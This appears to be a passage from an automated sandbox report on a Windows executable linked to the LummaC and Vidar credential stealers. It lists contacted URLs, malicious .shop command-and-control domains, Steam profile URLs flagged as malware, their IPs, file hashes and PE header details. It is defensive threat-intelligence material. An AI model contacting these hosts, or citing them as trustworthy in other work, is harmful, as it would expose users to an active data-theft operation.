                          https://steam.tv/RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://drawzhotdog.shop/RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGPRegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://performenj.shop/RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://vozmeatillu.shop/YRegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://store.steampowered.com/privacy_agreement/RegAsm.exe, 00000002.00000002.1795323805.000000000130E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://store.steampowered.com/RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://sketchfab.comRegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://lv.queniujq.cnRegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gifRegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://steamcommunity.com/profiles/76561199724331900/inventory/RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmptrue
                          • URL Reputation: malware
                          		unknown
                          https://www.youtube.com/RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://127.0.0.1:27060RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgRegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://stogeneratmns.shop/apiDRegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTgRegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://performenj.shop/GRegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://www.google.com/recaptcha/RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://checkout.steampowered.com/RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://help.steampowered.com/RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://api.steampowered.com/RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://store.steampowered.com/account/cookiepreferences/RegAsm.exe, 00000002.00000002.1795323805.000000000130E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://steamcommunity.com/RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://store.steampowered.com/;RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://steamcommunity.com/xRegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://steamcommunity.com/profiles/76561199724331900/badgesRegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmptrue
                          • URL Reputation: malware
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          104.21.77.130
                          		reinforcenh.shopUnited States
                          		13335CLOUDFLARENETUStrue
                          104.21.4.136
                          		gutterydhowi.shopUnited States
                          		13335CLOUDFLARENETUStrue
                          172.67.189.2
                          		performenj.shopUnited States
                          		13335CLOUDFLARENETUStrue
                          188.114.97.3
                          		fragnantbui.shopEuropean Union
                          		13335CLOUDFLARENETUStrue
                          188.114.96.3
                          		offensivedzvju.shopEuropean Union
                          		13335CLOUDFLARENETUStrue
                          104.102.49.254
                          		steamcommunity.comUnited States
                          		16625AKAMAI-ASUSfalse
                          104.21.58.182
                          		drawzhotdog.shopUnited States
                          		13335CLOUDFLARENETUStrue

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1519281
                          Start date and time:2024-09-26 09:51:12 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 3m 21s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:4
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:a7HdB2dU5P.exe
                          renamed because original name is a hash value
                          Original Sample Name:ec5818decca5d6703e23c9db8a772997.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@4/2@11/7
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 98%
                          • Number of executed functions: 13
                          • Number of non-executed functions: 80
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Stop behavior analysis, all processes terminated

                          Warnings

                          • Exclude process from analysis (whitelisted): SIHClient.exe
                          • Excluded IPs from analysis (whitelisted): 52.165.165.26
                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, sls.update.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • VT rate limit hit for: a7HdB2dU5P.exe

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          03:52:06API Interceptor5x Sleep call for process: RegAsm.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          104.21.77.130Notepad3_v6.23.203.2.exeGet hashmaliciousAmadey, GO BackdoorBrowse
                          • downloaddining3.com/h9fmdW7/index.php
                          am.exeGet hashmaliciousAmadeyBrowse
                          • downloaddining3.com/h9fmdW7/index.php
                          am.exeGet hashmaliciousAmadeyBrowse
                          • downloaddining3.com/h9fmdW7/index.php
                          104.21.4.136file.exeGet hashmaliciousLummaC, VidarBrowse
                            file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                      file.exeGet hashmaliciousLummaC, VidarBrowse
                                        file.exeGet hashmaliciousLummaCBrowse
                                          file.exeGet hashmaliciousLummaC, VidarBrowse
                                            172.67.189.2file.exeGet hashmaliciousLummaC, VidarBrowse
                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                  file.exeGet hashmaliciousLummaC, VidarBrowse
                                                    Suselx1.exeGet hashmaliciousLummaCBrowse
                                                      gkqg90.ps1Get hashmaliciousLummaCBrowse
                                                        Res.ps1Get hashmaliciousLummaCBrowse
                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                            file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                              SecuriteInfo.com.Win32.PWSX-gen.716.1862.exeGet hashmaliciousLummaCBrowse

                                                                Domains

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                gutterydhowi.shopfile.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 172.67.132.32
                                                                bYQ9uTqLzz.exeGet hashmaliciousLummaCBrowse
                                                                • 172.67.132.32
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 172.67.132.32
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 104.21.4.136
                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                • 172.67.132.32
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 172.67.132.32
                                                                ACeTKO93e9.exeGet hashmaliciousLummaCBrowse
                                                                • 172.67.132.32
                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                • 104.21.4.136
                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                • 104.21.4.136
                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                • 104.21.4.136
                                                                performenj.shopfile.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 104.21.51.224
                                                                HHXyi02DYl.exeGet hashmaliciousLummaCBrowse
                                                                • 104.21.51.224
                                                                bYQ9uTqLzz.exeGet hashmaliciousLummaCBrowse
                                                                • 104.21.51.224
                                                                HHXyi02DYl.exeGet hashmaliciousUnknownBrowse
                                                                • 104.21.51.224
                                                                SecuriteInfo.com.Win64.Malware-gen.15701.20735.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, MicroClipBrowse
                                                                • 104.21.51.224
                                                                SecuriteInfo.com.Win64.Evo-gen.13360.8133.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                • 104.21.51.224
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 172.67.189.2
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 172.67.189.2
                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                • 172.67.189.2
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 172.67.189.2
                                                                fragnantbui.shopfile.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 188.114.97.3
                                                                bYQ9uTqLzz.exeGet hashmaliciousLummaCBrowse
                                                                • 188.114.96.3
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 188.114.97.3
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 188.114.97.3
                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                • 188.114.96.3
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 188.114.97.3
                                                                ACeTKO93e9.exeGet hashmaliciousLummaCBrowse
                                                                • 188.114.97.3
                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                • 188.114.96.3
                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                • 188.114.97.3
                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                • 188.114.97.3

                                                                ASNs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                CLOUDFLARENETUSiq2HxA0SLw.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                • 104.21.37.97
                                                                Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 188.114.96.3
                                                                RFQ -PO.20571-0001-QBMS-PRQ-0200140.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                                                • 104.26.13.205
                                                                QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 188.114.96.3
                                                                Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 188.114.96.3
                                                                450230549.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 162.159.134.233
                                                                64.exeGet hashmaliciousUnknownBrowse
                                                                • 162.159.61.3
                                                                450230549.exeGet hashmaliciousUnknownBrowse
                                                                • 162.159.134.233
                                                                PO-100001499.exeGet hashmaliciousFormBookBrowse
                                                                • 188.114.96.3
                                                                ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                                                                • 104.21.64.108
                                                                CLOUDFLARENETUSiq2HxA0SLw.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                • 104.21.37.97
                                                                Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 188.114.96.3
                                                                RFQ -PO.20571-0001-QBMS-PRQ-0200140.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                                                • 104.26.13.205
                                                                QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 188.114.96.3
                                                                Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 188.114.96.3
                                                                450230549.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 162.159.134.233
                                                                64.exeGet hashmaliciousUnknownBrowse
                                                                • 162.159.61.3
                                                                450230549.exeGet hashmaliciousUnknownBrowse
                                                                • 162.159.134.233
                                                                PO-100001499.exeGet hashmaliciousFormBookBrowse
                                                                • 188.114.96.3
                                                                ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                                                                • 104.21.64.108
                                                                CLOUDFLARENETUSiq2HxA0SLw.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                • 104.21.37.97
                                                                Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 188.114.96.3
                                                                RFQ -PO.20571-0001-QBMS-PRQ-0200140.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                                                • 104.26.13.205
                                                                QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 188.114.96.3
                                                                Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 188.114.96.3
                                                                450230549.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 162.159.134.233
                                                                64.exeGet hashmaliciousUnknownBrowse
                                                                • 162.159.61.3
                                                                450230549.exeGet hashmaliciousUnknownBrowse
                                                                • 162.159.134.233
                                                                PO-100001499.exeGet hashmaliciousFormBookBrowse
                                                                • 188.114.96.3
                                                                ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                                                                • 104.21.64.108
                                                                CLOUDFLARENETUSiq2HxA0SLw.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                • 104.21.37.97
                                                                Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 188.114.96.3
                                                                RFQ -PO.20571-0001-QBMS-PRQ-0200140.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                                                • 104.26.13.205
                                                                QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 188.114.96.3
                                                                Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 188.114.96.3
                                                                450230549.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 162.159.134.233
                                                                64.exeGet hashmaliciousUnknownBrowse
                                                                • 162.159.61.3
                                                                450230549.exeGet hashmaliciousUnknownBrowse
                                                                • 162.159.134.233
                                                                PO-100001499.exeGet hashmaliciousFormBookBrowse
                                                                • 188.114.96.3
                                                                ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                                                                • 104.21.64.108

                                                                JA3 Fingerprints

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                a0e9f5d64349fb13191bc781f81f42e1iq2HxA0SLw.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                • 104.21.77.130
                                                                • 104.21.4.136
                                                                • 172.67.189.2
                                                                • 188.114.97.3
                                                                • 188.114.96.3
                                                                • 104.102.49.254
                                                                • 104.21.58.182
                                                                https://tiktoksc.tv/wapGet hashmaliciousUnknownBrowse
                                                                • 104.21.77.130
                                                                • 104.21.4.136
                                                                • 172.67.189.2
                                                                • 188.114.97.3
                                                                • 188.114.96.3
                                                                • 104.102.49.254
                                                                • 104.21.58.182
                                                                https://xtrafree.x10.mx/Get hashmaliciousUnknownBrowse
                                                                • 104.21.77.130
                                                                • 104.21.4.136
                                                                • 172.67.189.2
                                                                • 188.114.97.3
                                                                • 188.114.96.3
                                                                • 104.102.49.254
                                                                • 104.21.58.182
                                                                PersonalizedOffer.exeGet hashmaliciousUltraVNCBrowse
                                                                • 104.21.77.130
                                                                • 104.21.4.136
                                                                • 172.67.189.2
                                                                • 188.114.97.3
                                                                • 188.114.96.3
                                                                • 104.102.49.254
                                                                • 104.21.58.182
                                                                PersonalizedOffer.exeGet hashmaliciousUltraVNCBrowse
                                                                • 104.21.77.130
                                                                • 104.21.4.136
                                                                • 172.67.189.2
                                                                • 188.114.97.3
                                                                • 188.114.96.3
                                                                • 104.102.49.254
                                                                • 104.21.58.182
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.21.77.130
                                                                • 104.21.4.136
                                                                • 172.67.189.2
                                                                • 188.114.97.3
                                                                • 188.114.96.3
                                                                • 104.102.49.254
                                                                • 104.21.58.182
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 104.21.77.130
                                                                • 104.21.4.136
                                                                • 172.67.189.2
                                                                • 188.114.97.3
                                                                • 188.114.96.3
                                                                • 104.102.49.254
                                                                • 104.21.58.182
                                                                HHXyi02DYl.exeGet hashmaliciousLummaCBrowse
                                                                • 104.21.77.130
                                                                • 104.21.4.136
                                                                • 172.67.189.2
                                                                • 188.114.97.3
                                                                • 188.114.96.3
                                                                • 104.102.49.254
                                                                • 104.21.58.182
                                                                bYQ9uTqLzz.exeGet hashmaliciousLummaCBrowse
                                                                • 104.21.77.130
                                                                • 104.21.4.136
                                                                • 172.67.189.2
                                                                • 188.114.97.3
                                                                • 188.114.96.3
                                                                • 104.102.49.254
                                                                • 104.21.58.182
                                                                LcDQjpdIiU.exeGet hashmaliciousLummaCBrowse
                                                                • 104.21.77.130
                                                                • 104.21.4.136
                                                                • 172.67.189.2
                                                                • 188.114.97.3
                                                                • 188.114.96.3
                                                                • 104.102.49.254
                                                                • 104.21.58.182

                                                                Dropped Files

                                                                No context

                                                                Created / dropped Files

                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\a7HdB2dU5P.exe.log

                                                                Download File
                                                                Process:C:\Users\user\Desktop\a7HdB2dU5P.exe
                                                                File Type:CSV text
                                                                Category:modified
                                                                Size (bytes):425
                                                                Entropy (8bit):5.353683843266035
                                                                Encrypted:false
                                                                SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                                MD5:859802284B12C59DDBB85B0AC64C08F0
                                                                SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                                SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                                SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                                Malicious:true
                                                                Reputation:high, very likely benign file
                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

                                                                \Device\ConDrv

                                                                Download File
                                                                Process:C:\Users\user\Desktop\a7HdB2dU5P.exe
                                                                File Type:ASCII text, with CRLF, LF line terminators
                                                                Category:dropped
                                                                Size (bytes):33
                                                                Entropy (8bit):2.2845972159140855
                                                                Encrypted:false
                                                                SSDEEP:3:i6vvRyMivvRya:iKvHivD
                                                                MD5:45B4C82B8041BF0F9CCED0D6A18D151A
                                                                SHA1:B4DAD3FFFEF507CBB78671EE620BB495F8CE22F1
                                                                SHA-256:7CFA461ED1FC8611AB74878EDB1FBBDE3596F5D042946A42A7F31EB6D462E628
                                                                SHA-512:B29C3696A8A311EFAF9B9709BA082FF2C8D45A6912D79BC1DE7FEEFBEF8F8DDEFCD6650B5E1165D0A79800C8AED399E2B11BC2431E3837DD8587516BDE50EAB5
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:0..1..2..3..4..0..1..2..3..4.....

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Entropy (8bit):7.9894730772519456
                                                                TrID:
                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                File name:a7HdB2dU5P.exe
                                                                File size:374'784 bytes
                                                                MD5:ec5818decca5d6703e23c9db8a772997
                                                                SHA1:daeca7f333cedb461891a3fa4be6a857df452b59
                                                                SHA256:2da667c881a6b5f4b773c932bcbb6825fda5a85a38bfb51e06921cb88c353f3b
                                                                SHA512:12205f23f622518eddde5c9ecc5168929a421ff1a0442dca23104723a5ad7edfd1e84bcbba4afe03fe20823cb0d39e4fdf7fae716b43cd1cec244bb12d60c254
                                                                SSDEEP:6144:VX7iHuLVysIuU1dHpxx7VOEe9hTuubkP9vMV8DGtywI/ZM9M6vrNaIr6NKHQ3iFE:FZVyruU1BxcElnP9kV82Z+oRXQiFP
                                                                TLSH:5A842364F21A8765C764947AEE86962CCDF3B93A2A5F90076CE47E098D0DD3B1347B30
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....3.f................................. ........@.. ....................... ............`................................

                                                                File Icon

                                                                Icon Hash:90cececece8e8eb0

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x45ccee
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows cui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x66F43305 [Wed Sep 25 15:57:57 2024 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                Entrypoint Preview

                                                                Instruction
                                                                jmp dword ptr [00402000h]
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x5cc940x57.text
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x5e0000x5b8.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x600000xc.reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x5cb5c0x1c.text
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x20000x5acf40x5ae00c03cbc644eb253acf1af646f29cebfd3False0.9938477905777167data7.995621110986315IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
